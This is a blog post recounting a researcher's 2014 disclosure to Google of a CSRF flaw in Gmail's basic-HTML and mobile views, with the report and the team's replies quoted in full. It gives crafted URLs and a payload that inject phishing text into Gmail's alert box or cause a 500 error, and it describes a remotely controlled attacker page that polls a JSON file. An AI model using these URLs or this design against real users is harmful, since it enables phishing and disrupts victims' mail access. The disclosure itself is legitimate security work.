How i find a CSRF vulnerability in the heart of Gmail(Google Mail) STILL UNPATCHED AS ON 31/03/2015

Here I have find a vulnerability in the most secure Gmail from Google.

IT IS STILL UNPATCHED.SO USE IT FOR ONLY EDUCATIONAL PURPOSES.DON'T MAKE IT TO THE BLACK SIDE OF YOUR THOUGHTS.




First of all,I have reported this bug on 6/11/2014.

Here below is the raw report that i have submitted to google.

6/11/2014
--------------------------------------------------------------------------------------------------------------------------
Hey Google Security,

I have named this bug as "Gmail's alert box as attacker's playground".
The affected views of Gmail are mobile and desktop view,(Both Non Javascript)

Desktop - https://mail.google.com/u/0/h
Mobile - https://mail.google.com/u/0/x

An attacker have the full control over what message can be inside the Gmail's standard notification box.And he can also able to interrupt the whole Gmail Service in the victim's browser,which will return 500 Internal Server Error from the google server.And he can also uninterrupt or unblock the gmail service that have been blocked previously.


And the main point here is,The whole process can be done in realtime and the attacker can be in any location(Remote) to control the victim's browser.
Here below goes my reproductive section.

The affected URL is,
https://mail.google.com/mail/u/0/h/1r492fk6i9hhd/?v=prfap&bu=pfwd&scd=1&idmc=wf<Here goes the crafted message>%3E.

This above URL will set a cookie GMAIL_NOTI and redirect to Gmail with the message in the Gmail's standard notification box.

Just replace the crafted message section with a payload like this "<<<".
This will set a GMAIL_NOTI cookie.After the redirection.The server will return with a 500 internal server error.

Until the GMAIL_NOTI cookie is cleared out.

How it useful,make an attacker control the whole process remotely?It goes below in
"How an attacker can use this against a victim" section.

How an attacker can use this against a victim??
---------------------------------------------------------
First of all i already mentioned that this is a lack of CSRF protection.So iam pointing to the main points only as described below

3 main operation an attacker can able to do against a victim in remote,
A)Interrupt whole gmail service in victim's browser,
B)And also can uninterrupt or unlock the previously interrupted gmail service,
C)The main annoying point is that he can put dynamic text based ads or phishing messages in the Gmail's standard alert box,

And once more mentioning that all operation controlled by the attacker goes in realtime and from a remote location.

STEPS :- HOW AN ATTACKER CAN USE THIS BUG
---------------------------------------------------------------------
A)As we already know this is kind of CSRF vulnerability,So first of all the victim need to be served with attacker's page.
B)After victim opens the attacker's page and in a new tab he can open the Gmail and make the process as it is...
C)Now the attacker have full control over the alert box of gmail and can interrupt and uninterrupt whole gmail service in the victim's browser.

So here below goes the brief,

REAL LIFE SCENARIO
-------------------------------
A)Victim is shared with an attacker's page containing the script which is executed in a timely manner of 5 seconds repeatedly.

Note :- Sharing process is vast and the content of page can be anything that attracts victim and make the page open until his browsing session ends.And the URLs and techniques used here is only for explaining the bug and more for an attack against a real user may vary,its upto the thoughts.

Explaination of the execution of code in the attacker's page.
------------------------------------------------------------------------
The URL gonna be shared with the victim is.

https://googledrive.com/host/0BybXBiqiGLDhNXpqTVg5ZlpCaGs/googleRemoteControl.html

When he/she made open the above URL it will just give a blank page.But the hidden script will get executed.And i know you techie guyz can just catch up my javascript code in my above mentioned page.So iam not getting deeper.Here below goes the steps script will do.

1)First of all it will send a request to

https://mail.google.com/mail/u/0/h/17qgf1e1195tm/?v=prfap&bu=pfwd&scd=1&idmc=wfHey+there+whatsup+iam+shihab+over+here%3E

embedded in a script element.

2)It starts getting into a timer with an interval of 5000ms ie,each 5 second the script will execute repeatedly in the background.
It just grabs the content of the text file "ssoft.txt" in the current directory of the attacker's page.That is,it contains a JSON string which instructs the page what to do with.The example of the JSON string goes below.
[
{
"message": "This is the example of Advertisement 1.Can be also some phishing.Yours",
"payload": "interruptGmail"
},
{
"message": "This is the example of Advertisement 2.Can be also some phishing.Yours"
},
{
"message": "This is the example of Advertisement 3.Can be also some phishing.Yours"
}
]

NOTE :- The text file "ssoft.txt" is modified in the realtime from anywhere by the attacker.So that he can post text based ads as like above.And also he can make whole Gmail service interrupted.Will be explained below.And i here use googledrive sync application in windows.So that i can modify the text file "ssoft.txt" realtime.So that the googledrive will automatically makes the file synchronised to the servers.

3)The script then,checks 0th index of JSON parsed javascript array(ie,as per the JSON string above it will return an array of 3 elements).And check for the "payload" attribute of the array(0th index).
Then there are two cases
a)If the content of payload matches to the string "interruptGmail" then it will create a dynamic script element and assign the src attribute of the script to the URL below

https://mail.google.com/mail/u/0/h/17qgf1e1195tm/?v=prfap&bu=pfwd&scd=1&idmc=wf%3c%3e

It will block the whole Gmail Service with 500 error(already described above).
b)If the content does'nt match with the string "interruptGmail" then it will create a dynamic script element and assign the src attribute of the script to the URL below

https://mail.google.com/mail/u/0/h/17qgf1e1195tm/?v=prfap&bu=pfwd&scd=1&idmc=wf<Message>%3E

The message section will contains one of the string from the JSON parsed array.And the index of the array is chosen randomly.So the attacker can make it show random ads from the list.

If any previously blocked or interrupted Gmail(500 error) is cleared out.And the randomly chosen ad or phishing message that is up to the attacker,is just rendered in the Gmail's alert box.

So thats all.With this process an attacker have different kind of ways to exploit this using as phising or posting ads,etc because it is rendered in the standard Gmail's notification box.
Its upto your thoughts.

And if missed anything or anything that you can't understand just reply me.

And if you guys wanna test it in realtime.I have shared the "ssoft.txt" file and i made it to be editable.

https://drive.google.com/file/d/0BybXBiqiGLDhSDdwR3Z0UGhnNTA/view?usp=sharing

--SHIHAB
----------------------------------------------------------

I got a response on 7/11/2014

----------------------------------------------------------
Hey - Just letting you know that your report was triaged and we're currently looking into it. You should receive a response in a couple of days, but it might take up to a week if we're particularly busy.

Thanks,
Google Security Team
----------------------------------------------------------

After two days,I got a response back on 10/11/2014

----------------------------------------------------------
Hey,

Thanks for your bug report. We've taken a look at your submission and can confirm this is not a security vulnerability. To be able to start an attack, the attacker would have to know the secret value in the URL (the one after /u/0/h/ ). Have you been able to obtain this value without already having access to the victim account?


Regards,
Krzysztof, Google Security Team

Krzysztof,the member of Google Security Team,Told me that it is not a security vulnerability :-).And with a big question
Have you been able to obtain this value without already having access to the victim account?
Sorry Krzysztof,I don't want to obtain this value because it does'nt matter.:),Here below,Why?
-------------------------------------------------------

Its on the same day 10/11/2014,i have replied him why?

---------------------------------------------------------------------

Hey Krzystof,

First of all thanks for reviewing my report.

You have asked that,an attacker would need to know secret or kinda
XSRF string in the URL like below.

https://mail.google.com/mail/u/0/h/17qgf1e1195tm/?v=prfap&bu=pfwd&scd=1&idmc=wf<SOME_MESSAGE>%3E

From the above URL secret id is :- 17qgf1e1195tm.

But as per my research it is just a random value inserted between the
URL.And i can confirm that it is not a XSRF or any kinda
secret.Because,

We can enter any value,by replacing the mentioned value like below.

https://mail.google.com/mail/u/0/h/shihabsoft/?v=prfap&bu=pfwd&scd=1&idmc=wf<SOME_MESSAGE>%3E

Here i have changed the value to :- "shihabsoft".

So it does'nt matter the process does'nt get interrupted.But goes as normal.

For confirming just copy and paste the below URL into your address bar.

https://mail.google.com/mail/u/0/h/shihabsoft_any_message_you_want/?v=prfap&bu=pfwd&scd=1&idmc=wfSOME_MESSAGE>%3E

So here you can confirm that it is a vulnerability,based on my
report.The way an attacker can use this bug is vast.

And if you are inneed of more details.Feel free to ask...

Thanks,
SHIHAB :)
-------------------------------------------------------------------------

After that i have never got a response for 5 days,on the 6th day i got a response on 16/11/2014.

-----------------------------------------------------------
Hi,

Thanks for your report. This report looks like a duplicate of another case 5-3148000005303 that is also reported by you, so I'll close this one as duplicate and process the case 5-3148000005303.
Regards,
Quan, Google Security Team.

It is just a case of duplication,that i have accidentally submitted the same report twice with different emails.
--------------------------------------------------------------------------

So i tried to reopen the case 5-3148000005303 as said by Quan,Its on the same day 16/11/2014.He replied me by asking a question.

Hi,

Thanks for your report. Whenever I click the following link:  https://mail.google.com/mail/u/0/h/anything/?v=prfap&bu=pfwd&scd=1&idmc=wfanotheranything%3E, nothing happens. It's only redirected to "Forwarding and POP/IMAP" when I copy/paste the link in the browser, so I'm not sure what is the attack's scenario. You mention that you have a kind of Proof of Concept:googleRemoteControl.html. Could you please make it work such that whenever I access it then I see the repeated alerts in my Gmail testing account?

Regards,
Quan, Google Security Team.

--------------------------------------------------------------------------

Are you getting bored ITS A BIG NO iam thinking so,because its an interesting topic about security and more interesting about our conversation

Its on the next day,i have clarified him my stand on 17/11/2014

--------------------------------------------------------------------------

Hey Quan,

Sorry for the long delay,replying you.

As you have said whenever you follow the link by clicking or copy
pasting,nothing happens over in your browser.

Ok i will get you into deeper.I am mentioning the alert box as GMAIL's
standard notification box(in which all alerts are shown that means a
yellow box with the text in it and not the javascript alert box).The
picture is provided below to better understanding.

So after you followed the link:
https://mail.google.com/mail/u/0/h/anything/?v=prfap&bu=pfwd&scd=1&idmc=wfanotheranything%3E,

The message will be shown like in the below picture.
https://googledrive.com/host/0BybXBiqiGLDhNXpqTVg5ZlpCaGs/googCSRF.png

And you have asked me to provide the POC googleRemoteControl.html.

It seems you have'nt yet read my report carefully,because i have
already mentioned the link for that.Better putting once more,

Jz follow this URL by clicking it below.

https://googledrive.com/host/0BybXBiqiGLDhNXpqTVg5ZlpCaGs/googleRemoteControl.html

And follow the simple instruction over there.

And at last you will encounter that gmail's notification box is filled
with ads that posted by the attacker through his page.And may be also
some phishing because the message is in the heart of the GMAIL's page.

And i already mentioned in my report that.That the attacker's page
reads instructions and ads or phishing messages from a file called
"ssoft.txt" in the same attacker's server.

So that the attacker can have full access to the alert box of the
victim and also he also have the option to interrupt the whole gmail
service in the victim's browser and also uninterrupt.
NOTE :- The victim can't ever access non javascript of both mobile and
desktop GMAIL at the interrupted state.But he have access to modern or
latest UI.(/u/0/ or /mu/mp).But most users facing slowing internet
connection will move onto that.(Oh its not the topic here right
now).So
the two main advantage of the attacker,he could be REMOTE and REALTIME.

And if you wanna know more,Jz read my report carefully once more.I
have provided all in that.also the link for ssoft.txt and how to edit
instructions.

NOTE :- If you can't access or edit ssoft.txt directly.Its not a
problem.Because it is provided jz for demonstration.And you can
reproduce it with whatever way like you want.Its upto your thoughts.

Keep in touch,
---SHIHAB :)

--------------------------------------------------------------------

ATLAST ON THE SAME DAY 17/11/2014 I GOT A GOOD RESPONSE FROM QUAN.

--------------------------------------------------------------------
Hi spk674,

Nice catch! Thanks for your clarification. I’ve filed a bug and will update you once we’ve got more information.

Regards,
Quan, Google Security Team
--------------------------------------------------------------------

Some conversations have gone between the 17/11/2014 to 20/11/2014.I don't wanna bore you my precious visitors reading those also.At last i got awarded on the day 20/11/2014 by Kevin(Google Security).I had my listed on just in the Honorable Mention page.

May i ask is it fare.Is it way the Google handling vulnerabilities.And just got my name in the Honorable Mentions page,not even with 100$ penny :).You visitors wanna make a decision.I have told my full story from 6/11/2014 to 20/11/2014.

And do you think iam faking you guys.

NO NEVER EVER

Just move on to the URL below and Search for ShihabSoft or with revealedtricks4u.blogspot.com

http://www.google.co.in/about/appsecurity/hall-of-fame/distinction/

You can find my name on there,Hope you understand me.Thank you very much for reading this whole post.Any doubts or queries just express it on comments.I am here to assist you.

:)SHIHAB
Share on Google Plus

About Shihab Soft

I am Shihab, people used to call me a Security researcher or sometimes a Reverse engineer or sometimes a creepy hacker ;). Got a brain full of knowledge in different programming languages, and not more nor less I am a blogger too :).
    Blogger Comment
    Facebook Comment

0 comments:

Post a Comment

Don't be shy. Just, leave your comments. Iam so happy to assist you. And, don't forgot that, I am such a nice person who you are dealing with :)

Don't be shy. Just, leave your comments. Iam so happy to assist you. And, don't forgot that, I am such a nice person who you are dealing with :)